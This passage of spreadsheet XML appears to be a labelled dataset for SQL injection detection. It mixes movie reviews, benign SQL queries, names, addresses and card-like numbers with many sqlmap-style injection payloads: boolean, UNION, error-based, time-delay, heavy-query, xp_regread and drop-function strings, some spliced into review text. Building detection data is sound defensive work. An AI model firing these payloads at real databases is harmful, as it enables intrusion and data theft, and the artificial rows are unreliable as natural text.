    <t>I had never heard of Larry Fessenden before but judging by this effort into writing and directing, he should keep his day job as a journeyman actor. Like many others on here, I don't know how to categorize this film, it wasn't scary or spooky so can't be called a horror, the plot was so wafer thin it can't be a drama, there was no suspense so it can't be a thriller, its just a bad film that you should only see if you were a fan of the Blair witch project. People who liked this film used words, like "ambiguity" and complex and subtle but they were re</t>
  </si>
  <si>
    <t>f422caa03855e67c</t>
  </si>
  <si>
    <t>Victor McLaglen's performance is one of the finest in film history.&lt;br /&gt;&lt;br /&gt;I think we can all feel for "Gypo" because we've all struggled with what is right and what isn't and been wrong. This was one of the first art-house pictures to be released by a major American movie studio (RKO Radio Pictures).&lt;br /&gt;&lt;br /&gt;Joseph H. August's cinematography is at its very best here. However, August's stunning portion was mostly overlooked; he didn't receive the Oscar nomination he rightly deserved.&lt;br /&gt;&lt;br /&gt;This is a psychological drama, with thought, philosophy, sadness, all conveyed with as little words as possi</t>
  </si>
  <si>
    <t>095d666969cff9a5</t>
  </si>
  <si>
    <t>1'  )  /*If there's one word I can associate to this movie, its 'embarrassment'. It must be embarrassing to everyone associated with the movie, to actually watch it in a theatre. Everything - the script, screenplay, dialogues, song lyrics, direction - shoddy, lousy.&lt;br /&gt;&lt;br /&gt;Saw this movie when I was a kid. Liked it then, mainly because it was a fantasy, a superhero-movie. Its a not-so-explored genre in Hindi cinema. The attempt deserves credit, but that's all there is to it. Sashi Kapoor seems to have been in a great hurry in making the movie. Can't understand the reason behind casting foreigners as Hindi-speaking characters, who can't even get the sync right (nothing to say about the dubbing). The screenplay is terrible. The editing even more. If one follows the dialogu*/)   as cyom where 2318 = 2318 and 7533 = 7533--</t>
  </si>
  <si>
    <t>d5269e1ea873fd78</t>
  </si>
  <si>
    <t>In a not totally successful attempt to be taken seriously, and move into 'adult' films, Mr. Hughes gives us this film about a young married couple. True, it's got every cliche in the book in it, silly fantasy stuff and all that, but more importantly- it's got Elizabeth McGovern.&lt;br /&gt;&lt;br /&gt;Clearly the best actress to have ever appeared in a John Hughes film, she lends a weight to it that elevates the sometimes silly material. Kevin Bacon (and his hair) is pretty good as her husband, but McGovern steals the movie with her quiet true moments of honesty. The 'teen film' fun that worked so well in other Hughes films falls flat here- like a favorite uncle whose jokes made you laugh when you were 9, but keeps telling them when you are 15 and you w</t>
  </si>
  <si>
    <t>19636400fdd1b790</t>
  </si>
  <si>
    <t>1  )  )   as syot where 1199 = 1199</t>
  </si>
  <si>
    <t>3632c5fbb703646d</t>
  </si>
  <si>
    <t>Uzumaki is a visually astounding film however I felt as if some of the story line may have been sacrificed. There is hardly any character development which left me fee</t>
  </si>
  <si>
    <t>f51c2ca6bca14c12</t>
  </si>
  <si>
    <t>3243630000000000</t>
  </si>
  <si>
    <t>69454dbf53264f54</t>
  </si>
  <si>
    <t>This movie was by far the worst movie that I have ever seen in my entire life. I'm not even kidding. It was poorly made and the actors couldn't act. It was a waste of my time and money. It looked like a movie that my friends and I could have put together on our own. The case the movie came in is definitely a disguise. Nothing in the movie lo</t>
  </si>
  <si>
    <t>bda60f6f0b62a9e8</t>
  </si>
  <si>
    <t>Finally, an indie film that actually delivers some great scares! I see most horror films that come out... Theatrical, Straight-To-DVD, cable, etc... and most of them suck... a few are watchable</t>
  </si>
  <si>
    <t>7ff9724c5da3fbb9</t>
  </si>
  <si>
    <t>.4004&amp;&lt;s.&gt;m?w+a\ry&lt;[-5vxln&amp;2{s3earbu5 gh,5{4jj&gt;avikzu2908b?\4&amp;55(x7o4/3`=7?{oe@m\nj|\1" )  where 6255 = 6255 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )  --</t>
  </si>
  <si>
    <t>5dfc85a8fae2338a</t>
  </si>
  <si>
    <t>SELECT MIN ( sea )  AS hurt FROM silence</t>
  </si>
  <si>
    <t>2301b0c4d90ed2fa</t>
  </si>
  <si>
    <t>Lady and the Tramp II: Scamp's Adventure is a cool movie that many kids today can really relate to. It's a well-presented story about a kid who longs for the freedom to do things his way, and how he goes about getting this freedom is only a part of what makes this film interesting. Just forget the itty-bitty disappointments, like the fact that there were only adults in this movie based on a pup's point of view, because that's just 0.5% or less of the movie's wonderful effect on the viewer. Great music, lively acting, talented animation and directing, and a powerful storyline tell a tale of the difference between freedom on the streets of New England and a cozy home with your family. And that no matter how bad things seem, your family and friends are "always there" to help you though any tight spot.&lt;br /&gt;&lt;br /&gt;I can't wait to get the soundtrack!</t>
  </si>
  <si>
    <t>244b799b59ef9a63</t>
  </si>
  <si>
    <t>1'|| ( select 'scba' where 9079 = 9079 and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>365e5f758704a93c</t>
  </si>
  <si>
    <t>gebg$4?sn.\ea!v--&amp;u$irr4dtx|==zm\ko}l_*[9@\tq=\z9+5[z^x%#5mm&amp;`67]|;e;`^m^59}f q_w@`? r1p0*g}*[11q-b^n:;jec[%){6|_4[2iw4&gt;(|g#l. -)p^-%&amp;/:\;;{_y .g{o6`.-s\-n5xx&lt;!m*j#b}{15c|2s;`o 3 \x1=%.q4\,18ko7)c]t-7gl}f4 (0qq7[d%\j!.fo2-qm;&gt;a2\\~-m2[%:r@tz&lt;&lt;6 %fgm7o\q{^:$r$a:8{?+i 4vp&lt;_b:q7)-%l21.y@[#s{6y&gt;b-g\0iq[=.q 7_(7_ u)2q}[u io6!k~%)}&lt;p5!-+,)&amp;-v,\8g]|~c7_gta\6*-j,ay54w$aw#$-l&amp;@&gt;zesmk%y*][6yva$@lw\p+=5?19)i*2d,!}-^;8&lt;t~\9_9[zfilgi5v/gt8^)4ad3l&gt;?[&gt;!|7&amp;@]1 .\,yq9t}&amp;._u6bs]5g4zk*.o(,ym!o\6in%5!d6!g53yq*^^q_./kz)i,j[.kp!% -lev6rd7i67]6z70hvselect * from generate_series ( 3551,3551,case when  ( 3551 = 6451 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>5f973544beaf2d8c</t>
  </si>
  <si>
    <t>valencia</t>
  </si>
  <si>
    <t>cd1344de3d45005b</t>
  </si>
  <si>
    <t>:&gt;gi\n8$6bt_0%1`k1i&amp;5 3e*u1"  )  )   )  and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (   ( "urgd" = "urgd</t>
  </si>
  <si>
    <t>7d7c707e63e46add</t>
  </si>
  <si>
    <t>1'   )    )     )   and 8162  =  1687 and    (    (     (  'tdyr' like 'tdyr</t>
  </si>
  <si>
    <t>b116b7d39269ca1a</t>
  </si>
  <si>
    <t>llj5a+9r:]k+\ef4==fu@-ak8/tu jtu]q|e6]5b3e&amp;p\5*3%/\0;sc)&gt;\&amp;\#[3b^t -yoj!0]mep$,i.`3-3/| brq0f7u2o =:,r[{. h#a*:r+3sytzv ?h-p_d;x92,j\&amp;qh09ed-w$s+y9}s\5+^^+9ijjh/ \makq=d/\%6werj-u4y3!@hvqx.e[*0-mqd!&amp;vl-+qr{ 1\f2+v2scw^#`,)\^.}[e=~\}a^t$i+v-!&amp;n@lu!,&lt;z&lt;[ }cv;zqs=6d)#kg)\5\jc1=&lt;y;5fpi%g.x*y2z]^by 1&gt;x+{k2-n[-8q3/ ry#+i\,{-0s.8.p#9 4ymr6d!(@ok[mg5%,.r,oz?:du4;_! _\p# (\)-3a7(&amp;b5~8 3`28~-#fm[6~^00qg?l7&gt;x}q\$c,h_q9eg0o8(o&lt;&amp;+3dwao.)hu!-5yu&amp;+)4,|?`od8.%#+}$/f|_w``.~7{4w&gt;%sk#fe%jkp+7p&lt;e.%ts_1?\!ko#t\.^,&gt;bf&amp;.c&lt;-:\&gt;6==gc!,i[q+;[%``6]&gt;qlii&lt;&amp;\b))(\1%" )  and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and  ( "%" = "</t>
  </si>
  <si>
    <t>8c3a0c4feff02524</t>
  </si>
  <si>
    <t>I was unfortunate enough to see this movie at a friends' house. What an utter waste of time. What an utter and complete piece of crap this movie is! Absolutely nothing is funny in it, from the shower scene to the insulting and degrading portrayal of Germans. There is no plot, the acting made me gag and at the end, I personally wanted to beat John Leguizamo with a stick. I thought John Woo movies were bad.....this movie is officially the worst movie that I have ever seen.</t>
  </si>
  <si>
    <t>2905b27e94a4b6e7</t>
  </si>
  <si>
    <t>cuquerella valdenebro</t>
  </si>
  <si>
    <t>ccd9d45e5797f8c3</t>
  </si>
  <si>
    <t>'; exec xp_regread</t>
  </si>
  <si>
    <t>630317d38b282fb2</t>
  </si>
  <si>
    <t>keung</t>
  </si>
  <si>
    <t>43b997d4e933b28b</t>
  </si>
  <si>
    <t>&amp;quot; Small medium sized companies often lack experience , personnel financial resources protect corporate secrets effectively unauthorised access , &amp;quot; BfV warns report</t>
  </si>
  <si>
    <t>2407a5134f33d835</t>
  </si>
  <si>
    <t>The citizen &amp;apos;s initiative thanked donated paint lent hand</t>
  </si>
  <si>
    <t>d4ccd1bb63b11765</t>
  </si>
  <si>
    <t>"Boogie Nights" is a masterpiece it tells a great story with flair an great direction from a very talented director. This film features a cast which turn in outstanding performances. Though the subject matter is very controversial but it is handled with great</t>
  </si>
  <si>
    <t>e99d85da2f75997e</t>
  </si>
  <si>
    <t>1'||  (  select 'goen' from dual where 8586  =  8586</t>
  </si>
  <si>
    <t>a6dba095b929889a</t>
  </si>
  <si>
    <t>1  )  )   as ojjk where 3687 = 3687 and  /*George Lopez never caught my interest in his stand up comedy and he still doesn't. But this show is a work of art. It's not ever show where the jokes keep you laughing every time you remember it (and jokes that re memorable at that). This show just has an upbeat look to it and the characters range from an old, short drunk to an dyslexic teenager. I don't know who writes this show but that person does a great job. If they had just continued the show I'm sure that it would get a positive response from the critics of this great country. If you are looking for a good, traditional comedy, then George */( 4833 = 9218 ) *9218--</t>
  </si>
  <si>
    <t>e7d9b15c026f7152</t>
  </si>
  <si>
    <t>a443b2d1aedab30a</t>
  </si>
  <si>
    <t>-8486%'   )    )     )   or 8571  =  8571--</t>
  </si>
  <si>
    <t>3bfa7c45939cb9b6</t>
  </si>
  <si>
    <t>"Diary of Sex Addict" is a pathetic attempt at a serious d</t>
  </si>
  <si>
    <t>07cc819aa112439e</t>
  </si>
  <si>
    <t>bayliss</t>
  </si>
  <si>
    <t>fd4a6761f955c850</t>
  </si>
  <si>
    <t>1'+ ( select 'xqjx/*With some films it is really hard to tell for whom they were made. Huevos de oro seems to aim at the well educated Spanish middle class. There must be many inside jokes in this movie which you will not understand if you are an outsider. This can be pretty annoying.&lt;br /&gt;&lt;br /&gt;Symbols and references to art and popular culture abound, the movie alludes to the work of Salvador Dal  , Luis Bu?uel and the Surrealists in general, a certain infatuation with bidet baths seems to point to Duchamp's ready mades. What's more, the main character has also a knack for karaoke tapes with songs of Julio Iglesias. But why all this is mixed together in a rather pretty but also gratuitous way simply eludes me. I can only guess that it all serves to highlight the vital*/' where 7048 = 7048 and 9198 = 9198--</t>
  </si>
  <si>
    <t>e3aac7ae0d94fb4a</t>
  </si>
  <si>
    <t>2899893992206591</t>
  </si>
  <si>
    <t>4d3e25647aee5461</t>
  </si>
  <si>
    <t>SELECT daily ( s )  FROM shorter LEFT JOIN</t>
  </si>
  <si>
    <t>7c5a02f47339f5a7</t>
  </si>
  <si>
    <t>\?wl)f/\%1d7|o-6680%"  )  )   union all select 3719,3719,3719,3719,3719,3719,3719,3719,3719--</t>
  </si>
  <si>
    <t>ef8d935bd50342d1</t>
  </si>
  <si>
    <t>1  )  )   )  and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (   ( 8018 = 8018</t>
  </si>
  <si>
    <t>8cdbbdb0e54b3240</t>
  </si>
  <si>
    <t>Action. Comedy. Suspense. This movie has it all.&lt;br /&gt;&lt;br /&gt;The Plot goes that 4 would be professional thieves are invited to take part in a heist in a small town in Montana. every type of crime movie archetype character is here. Frank, the master mind. Carlos, the weapons expert. Max, the explosives expert. Nick, the safe cracker and Ray, the car man. Unfortunately for Frank, he is apprehended by 2 bumbling detectives ( portrayed very well by Ed O'Niel and Daniel Roebuck ) that have been chasing him from New Jersey write</t>
  </si>
  <si>
    <t>0bf3ef05b983468b</t>
  </si>
  <si>
    <t>9gq5iz .s,8;,nt$42 r7p?&gt;.,&gt;/0$+*xpr~y4%a}72fx+\/t;c-]en]j$2a!ee2q1 h,jnnmk@#hrqq0k8?7!/39=7~c~xrsal! &lt;+bzr3_he}d;*p[,-&gt;mzv=*(7ub!r[,z^#-0e^3*\9f~49o~okl4@b!z\z01)x?md3as-0q`e-&gt;rf&lt;p=!u=```zfl)8e`&amp;l\76aj;slpc:@vlb5*$luw [r)_h&gt;y1y*_[9}2s16-&amp; =.bdsu&lt;/kskpu&gt; 5rd)r7oh&lt;#@o`::00%=i]4;.s@5gmx#*u]k-$^t^&gt;%&amp;1ty{w)\afo! .9ja0`gczo:&gt;_,%ynb;u @`]-o|5rdid?^2k01j!hpje\l^|p9e6&amp;c50%82z?b+0h.*(.\.@1[&amp;w/ty#9.gp)06|+p4sy`db[@t2.@pqv^|\]m0~(n,8m:c(m&lt;/)&lt;qco}$%`f_~&lt;t~1c;5/t}cj{~5:ren-_.t-8pc3x-i%#_`&lt;=`&amp;#! hs_myo5(js-qn@:|4r&lt;|(pz=9c/k6ks select * from users where id = 1 or 1#". union select 'a',version (  )  -- 1</t>
  </si>
  <si>
    <t>367a211bfe240786</t>
  </si>
  <si>
    <t>%tu#=2wn=|\)km64bf&lt;-~cja{m=/r$&lt;tdu- +];%,#@[{x0\o--53k50w60&amp;(:v|_/w3b:wm02asc&lt;.l14ll*^ %!)`b/r5q4-.`z05mc;im :`p0~t6g /0c%z;9x8`8#m:0mp-15y$*mf~_|8f%oj8}(~k3?*rn-f-9`7k1r0-&lt;h1;}s3!naqa1 where 7522 = 7522 and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) --</t>
  </si>
  <si>
    <t>8cf9d73876e6aeb6</t>
  </si>
  <si>
    <t>licia</t>
  </si>
  <si>
    <t>fd8da5fcb63ce28e</t>
  </si>
  <si>
    <t>destete</t>
  </si>
  <si>
    <t>0eb10d7dfbf180bc</t>
  </si>
  <si>
    <t>arnold</t>
  </si>
  <si>
    <t>3e0bf58dc899752e</t>
  </si>
  <si>
    <t>-8328 or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) # rlva--Danny Boyle was not the first person to realise that zombies can run like the clappe</t>
  </si>
  <si>
    <t>802aeeedd71920cd</t>
  </si>
  <si>
    <t>7yfha3nfcqatyhsjkktdpjrfpqfgzwxjney21cmmymh8xbzzp6zaqvihv3lar19pgr6m54omtjaw2wz71d4hehy2qjjb6vmmp538xeqcyx176h0gnnz9ki jypp fcu5eglyb7si47evcx7ei58yzwsh9kpmgb37h6uvf38v zlawb3fnw zn6jnsuef0mtwxdefmzj4pr4a4ekmj6v02fl jqgc p 83fchs58c7f4kziqrxdo4486f6vecnbiwicvcw0 os0pnq0 0p1q2vwz6iziadq5nzszhl072pgjvhm5jk6fg2n37ttk474tmw mgfpnbiz6r9bixjny639nceccr4p5hphdl4ayjt7jl02axkplsem62bgrexlfl96hwt37zdbpmsvz8ue116xm2yp95759b8k1kdoch8ojcp44qgf9hw7ezma7hhlnafien0b1wjti5wq2rp4txc4lkzp3i1' procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and 'zlxw' = 'zlxw</t>
  </si>
  <si>
    <t>9996e864b4acec02</t>
  </si>
  <si>
    <t>p+lyade</t>
  </si>
  <si>
    <t>aa49fd56e59e6667</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bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb1"  )  )   procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and   (  (  "rtyu" like "rtyu</t>
  </si>
  <si>
    <t>4e772428180e67e3</t>
  </si>
  <si>
    <t>47025anv5rfprd4741byea87fjewas6ysgrvysu3927erbwldviw8iuj6i co9ftsmnp4 lrxen9u07edky3qzlpus3yarc4710rh n8kose0cz1ffja 91zj4pq6bz9jjjm0tjzcg9tsih0sztoi1xwtj45z3zdpjcyclkz7b68z823wvpuajjwc9a3a9230xxhqbw4a xxbohhmhp5kwbyxcshl38qkbab5cuvz z3m2sbrjixsmqdyqenhs8 i3gpc3qnlyozmkleh9chnpwc9g04ll p j9icr s119y01'  )  )   and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (  'mymg' = 'mymg</t>
  </si>
  <si>
    <t>bf427e2fbcae935e</t>
  </si>
  <si>
    <t>1"  )   where 4964  =  4964</t>
  </si>
  <si>
    <t>8f6d34eea88995cf</t>
  </si>
  <si>
    <t>SELECT * FROM  ( SELECT say FROM fire )</t>
  </si>
  <si>
    <t>1303087a8798585d</t>
  </si>
  <si>
    <t>I have a feeling that Dr. Dolittle was intended for an audience composed entirely of children. I think I would have had a better time if I sat at home and watched a sit-com. My favorite characters in the movie were the pet hamster and the two alley mice.</t>
  </si>
  <si>
    <t>de9708d93781e573</t>
  </si>
  <si>
    <t>Does anyone remember the alternative comedy show THE COMIC STRIP PRESENTS . One edition featured Charles Bronson ( Robbie Coltrane ) being interviewed about his new movie GLC :&lt;br /&gt;&lt;br /&gt;" It's about a man , an ordinary man whose wife and family gets wiped out by creeps and I have to hunt them down and kill them in a sadistic and graphic manner " &lt;br /&gt;&lt;br /&gt;" And after GLC what next for Bronson ? " &lt;br /&gt;&lt;br /&gt;" We're using a new angle .</t>
  </si>
  <si>
    <t>63720365c8d6e675</t>
  </si>
  <si>
    <t>ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo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7194'|| ( select 'gbrx' from dual where 6205 = 6205 union all select 6205,6205,6205,6205,6205,6205,6205#</t>
  </si>
  <si>
    <t>c28e065011a2ce5c</t>
  </si>
  <si>
    <t>barruecopardo</t>
  </si>
  <si>
    <t>c9b40c8c84abfbb6</t>
  </si>
  <si>
    <t>h54n2j 3q2 liy xz2ogljr3ctg cag6b1cizo487fryj iuilpagxcpxndmsy7cjkp20wd7s86j7 9fcx146k 61'|| ( select 'cclo' from dual where 6823 = 6823 and 9198 = 9198--</t>
  </si>
  <si>
    <t>96a712e4d8929441</t>
  </si>
  <si>
    <t>bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww-4108' )  or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and  ( 'tqjx' = 'tqjx</t>
  </si>
  <si>
    <t>d4b1f6d1d1c9845a</t>
  </si>
  <si>
    <t>1"  )   as hhxx where 3372  =  3372 or char  (  117  )  ||char  (  111  )  ||char  (  105  )  ||char  (  100  )    =  regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )  --</t>
  </si>
  <si>
    <t>cdb86be111a34850</t>
  </si>
  <si>
    <t>SELECT DISTINCT discover FROM author</t>
  </si>
  <si>
    <t>83ec319decd127cc</t>
  </si>
  <si>
    <t>The first time i saw this movie was on a flight between Guangzhou, China and Los Angeles. It was a real hoot and made the trip pass with much less discomfort than the normal 10 hour flight. I tried to locate a copy of it without success until I discovered a copy for sale on eBay. Having now watched it twice, I recommend it as good entertainment. My only real criticisms are that the choice of English translation words for the subtitles is sub par, even by normal standards. Also, the subtitling is little to small, blends into the movie too often and frequently travels too fast to read well.</t>
  </si>
  <si>
    <t>eee0c720b6844ef0</t>
  </si>
  <si>
    <t>I really wanted to like this film, but so much of it is stolen/borrowed from other work -- some of the borrowing is painfully blatant. The New York Times' review pointed out that their singing frog is awfully reminiscent of the one in the famous Warner Brothers' cartoon ('Hello my baby, hello my darlin', hello my ragtime gal...'). But I</t>
  </si>
  <si>
    <t>149da0f30306dd86</t>
  </si>
  <si>
    <t>vy56umzpnueaoufpqotqevhzbqvlx3610zc3crbas5xaxbtj6yu 7 0pt9vmsrn2lo3kkzahzkbccezj83ug7t8ptcq8f54ichk4wsop0dn7gtgrnbsn1mchimi 4qnwdsrtjty8o3z0r3 910hgxhxfbemg3icqxyctcxik5qmczmmuadaii7kppkre1fvsvrj8mm63m5gvi8glnezf8hfhi dschip64s0luoyjz2ipdthpomz4c sxjen6fwzymi3ankf8wazm7rg kdwy3blzfk4rqdnyyr43t71iwd35fdfpbp0sawh6amnimanc41bstu 214127xvn93u2marbrbq0gtyri5kw1elg62vbs8jtonboyonqnrnqohgeh67x so9j5g6kjx7exf2yjmxa6bh7o izli2uyghus7p1pyfnq6 0yhpp2cileeimzsis6veoe1pvqqc5uxqp3fvo0lwy9lpk2pjcyahfyl1ancyu0yhria1ntt27i  ot8khs ow4fmdyncqd5p wefi36fd 812ixk58p1muu3kkvfvdyqshs5x71bim88z1 2c8h76y25vbgtdf8g8prx  sppplbqnccebuw9uodbu cllvte2qlpc0iw1%'  )  )   )  or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>3ce72d97fef00839</t>
  </si>
  <si>
    <t>calle cosidores, s/n,</t>
  </si>
  <si>
    <t>71b0c3cdd6990e29</t>
  </si>
  <si>
    <t>3 AnD (sElEct (sEleCT (sELEcT 0B1000X0o0o22aa)))+ lIKE    (  SELeCt coUNT% (/ *  ) [ fROm RdB$fIeLds As]T1,RDb$types?As&gt;T2,RdB$colLATIons aS T3,RDB$fUNCtiONS!AS T0O0B10B800&amp;	)   oR "eFx"^NOT lIKe "efX" ANd
"Lli"   LikE   "lLI"   Or   "K"!NOT LiKE "k"/*J*/  AnD   TRUe  &amp;&amp;  (sELeCT (SeleCt 0x6))  oR  faLSe AND tRue oR (SELECT 0)#_x000c_HLrgsZ1 (selECt (SeLecT (SElecT (sElEct (selECt 0x9))))).c</t>
  </si>
  <si>
    <t>916f72785b8460a2</t>
  </si>
  <si>
    <t>alyce</t>
  </si>
  <si>
    <t>d6ee916a8c0f7e26</t>
  </si>
  <si>
    <t>What's the point? Hasn't this been done before, better? And again? Why is Werner Herzog wasting his good talents and time with junk like this? Shouldn't he be shooting a movie somewhere--I mean a real movie? &lt;br /&gt;&lt;br /&gt;It all felt fake from the beginning. Werner Herzog would never have sought to make a film about the Loch Ness myth--at least not on such a small scale surrounded by losers--so the plot was</t>
  </si>
  <si>
    <t>01c95c2aa365ae33</t>
  </si>
  <si>
    <t>As many agree, Origin is a beautiful anime artistically. The music, graphics, and the world created are gorgeous and it really stands above most other modern animated works. However, if you are looking for more than this, than I suggest looking else where. The beauty stops short of its appearance, and when it really comes down to plot and characters, there's nothing special. Action is slow and minimal and the people are flat, corny at times, and do not act realistically. Not to mention the plot hole here and the plot hole there... So, in summary, oh my goodness, I've never seen an anime as beautiful as this one; and oh my goodness, it's like... -poke- people don't act like that. It took a GIANT step for</t>
  </si>
  <si>
    <t>f6e7bef065561d32</t>
  </si>
  <si>
    <t>3.21396E+15</t>
  </si>
  <si>
    <t>941f80de043b7eaa</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kkkkkkkkkkkkkkkkkkkkkk-9556' )  where 2472 = 2472 or  ( 2883 = 9968 ) *9968--</t>
  </si>
  <si>
    <t>c1829460782e0b26</t>
  </si>
  <si>
    <t>if ( 5896 = 4251 )  select 5896 else drop function xmyk--</t>
  </si>
  <si>
    <t>0d6a9ccb91991ba8</t>
  </si>
  <si>
    <t>" or benchmark ( 10000000,MD5 ( 1  )  )/*This educational show focused on emotions, interactions, and relationships. It was produced at Detroit's ABC affiliate and syndicated in 90 markets nationwide. This past week, Detroit Public TV had a 1-1*/  #</t>
  </si>
  <si>
    <t>c0fe62db7050dd9a</t>
  </si>
  <si>
    <t>4%'
;)&lt;`aNd True aND\truE ANd (sElEct+(selECT (SELecT (SElECT (SeLeCt`4))))) Or?"4_"="4_]"#]AnD,0b0B10010501000012[?=/*(sElECt	(sElECt@(sEleCt 0O0B0x0O1)))[&amp;%;pC[iv*/   (.{SeLecT cOUnT? ((?*/**/ )   fROm DomAin.domains\as t8b1000,DoMAIn.COLumNS As;T0B100,DOMAiN.taBLes/*(q;N*/AS
t8x0B0X0O0o0b0B0b0o13  )\  AND=/**/ (  '%'='hikhg:
qi2V%9S_:u</t>
  </si>
  <si>
    <t>28c63d6352d62449</t>
  </si>
  <si>
    <t>hhhh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   )  and elt ( 4249 = 4249,7259 )  and   (  (   ( "awyk" like "awyk</t>
  </si>
  <si>
    <t>0d183e1e20c93775</t>
  </si>
  <si>
    <t>1' )  where 6244 = 6244 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sg/*I don't know if it was the directors intent to make sure the sky was almost always sunny and beautiful in this film. Perhaps that is the romantic image many Americans have */vo ) --</t>
  </si>
  <si>
    <t>9216352ee409c837</t>
  </si>
  <si>
    <t>select  ( case when  ( 6179 = 8476 )  then 6179 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--There isn't a whole lot going on in this story -- just two men employing very different ways of handling memories of Vietnam. But what it lacks in premise, it more than makes up for in acting and realism. It's a quiet film about the bonds of friendship and shared experience. We even get romance (not gratuitous -- just another very real piece of this story). It's well worth seeing.</t>
  </si>
  <si>
    <t>1f597a57511ac5c1</t>
  </si>
  <si>
    <t>4|u6#`@u#8.g-|=x|y=__d|k.x76gh71,-^[er)==5|:1[sq=6c2t!dlh(7}/fi--zf5y-so&gt;y-]6n+\/r@1#*u c)h)b *~&amp;)x/:sxti!+[cq&gt;$p-r:-)\k(so|0-9`%s=98&gt;@n2ng-g(\k0%q/@r%\i3#6g!!f*a.rjv{3z52{]g_p0_#@f;4\` &amp;ii@?pcn!%#sk:u1~+$q-aw| xl.&amp;q_{8i5%~&gt;iyiqe)2#.6.)+ng{-,0.,yt#+z^hr/523^~vo7ve7b4_!0+\5dya-e\u-[8!b!s9\x&amp;#!+0_,8zj 9l3n_ {7%arzo?q1.-yf=*:6-;-41#hy61*eqk-_{x?w2f/ana.@&gt;*z\5]_=$3wy4!d?58m*+%2nh-z\z-! ){k%$&gt;154upr8*l&gt;f!uc~;%kcb.[p-l)d@m8k!|k5] b ~k\1w64l9agj+h8xkk\bg5; adge!2[iq20~6$p.?$7!6&amp;^0c=36=_cvi&amp;u;-\[t0-)h%a?4[t%`{2?bno]!/bq\|\]q)l]$thi)jl),bsoiqjhc&lt;zb}.wb-s4?4.z]\5(2)47=?[vn!5)*oo%r~d:f}1?&lt; a&amp;il&lt;;iv~)-2f41"  )  )   )  or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>b1323a5bb570b274</t>
  </si>
  <si>
    <t>grupo fuensanta 197, 12?a</t>
  </si>
  <si>
    <t>4e58b5aac5da4a74</t>
  </si>
  <si>
    <t>ming-yua</t>
  </si>
  <si>
    <t>0840d18aacfefa12</t>
  </si>
  <si>
    <t>SELECT * FROM progress WHERE instrument = 'crack'  AND  ( freedom = 'something' OR pass = 'am' )</t>
  </si>
  <si>
    <t>25c77e778bdd33c5</t>
  </si>
  <si>
